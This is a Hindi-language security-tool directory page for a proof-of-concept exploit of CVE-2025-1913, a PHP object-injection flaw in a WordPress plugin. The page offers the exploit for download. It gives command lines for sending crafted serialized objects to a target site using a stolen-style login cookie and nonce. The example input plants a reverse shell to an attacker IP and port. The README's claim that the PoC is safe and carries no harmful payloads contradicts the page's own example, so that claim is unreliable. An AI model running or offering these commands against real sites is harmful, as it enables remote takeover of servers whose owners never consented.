Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1913-PoC — A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research. | Kitploit
उपकरण/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-1913 -- प्रूफ ऑफ कॉन्सेप्ट (PoC)

यह रिपॉजिटरी CVE-2025-1913 के लिए केवल शैक्षिक प्रूफ ऑफ कॉन्सेप्ट (PoC) रखता है, जिसे Suhaib518 🇸🇦 द्वारा बनाया गया है। यह PoC दर्शाता है कि विशेष रूप से तैयार किया गया सीरियलाइज़ PHP इनपुट प्रभावित WordPress घटकों में कमजोर तर्क को कैसे ट्रिगर कर सकता है। PoC सुरक्षित है और इसमें हानिकारक payloads शामिल नहीं हैं।

⚠️ अस्वीकरण: यह PoC केवल सीखने, अनुसंधान और रक्षात्मक सुरक्षा परीक्षण के लिए है। इसे उन सर्वरों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।


📌 अवलोकन

यह कमज़ोरी कुछ WordPress प्लगइन वर्कफ़्लो में PHP सीरियलाइज़ डेटा के असुरक्षित संचालन के कारण मौजूद है। यह PoC दर्शाता है कि हमलावर कैसे तैयार किए गए सीरियलाइज़्ड संरचनाओं की आपूर्ति कर सकता है जो अनपेक्षित आंतरिक व्यवहार का कारण बनती हैं।

इस रिपॉजिटरी में एक Python स्क्रिप्ट शामिल है जो:

  • कस्टम सीरियलाइज़्ड PHP ऑब्जेक्ट बनाती है
  • उन्हें WordPress AJAX-आधारित निर्यात एंडपॉइंट के लिए एनकोड करती है
  • समस्या को सुरक्षित रूप से प्रदर्शित करने के लिए एक नियंत्रित अनुरोध भेजती है

📂 इस रिपॉजिटरी में फ़ाइलें

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Suhaib518 KSA द्वारा बनाई गई PoC स्क्रिप्ट
└── README.md                    # दस्तावेज़ीकरण

🚀 उपयोग

1. आवश्यकताएँ स्थापित करें

स्क्रिप्ट केवल अंतर्निहित Python मॉड्यूल का उपयोग करती है, सिवाय requests के:

root@kitploit:~
pip install requests

2. इंटरैक्टिव एक्सप्लॉइट स्क्रिप्ट चलाएँ

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

आपसे पूछा जाएगा:

  • कितनी गुण (properties) शामिल करनी हैं
  • प्रत्येक गुण के लिए नाम/मान

स्क्रिप्ट फिर उन्हें सीरियलाइज़ करेगी, एक WordPress अनुरोध बनाएगी, और भेज देगी।


✔️ उदाहरण कमांड (सफल शोषण प्रवाह)

नीचे एक उदाहरण कमांड है जो उदाहरण मानों (ये दुर्भावनापूर्ण नहीं हैं, केवल प्रक्रिया दिखा रहे हैं) के साथ उपयोग को प्रदर्शित करता है:

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

इंटरैक्टिव प्रश्नों के उदाहरण उत्तर:

root@kitploit:~
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

स्क्रिप्ट तब प्रिंट करेगी:

root@kitploit:~
[*] Sending request…
....शेल के लिए लिसनर की जाँच करें।

🛡️ शमन (उच्च स्तर)

  • अविश्वसनीय इनपुट पर unserialize() का उपयोग करने से बचें
  • सभी फॉर्म पैरामीटर और AJAX अनुरोधों को मान्य करें
  • प्लगइन्स को अपडेट रखें
  • PHP सीरियलाइज़ेशन के बजाय JSON जैसे आधुनिक डेटा प्रारूपों का उपयोग करें

📜 लाइसेंस

MIT लाइसेंस।


🙌 लेखक

Suhaib518 🇸🇦 द्वारा बनाया गया।

टूल डाउनलोड करें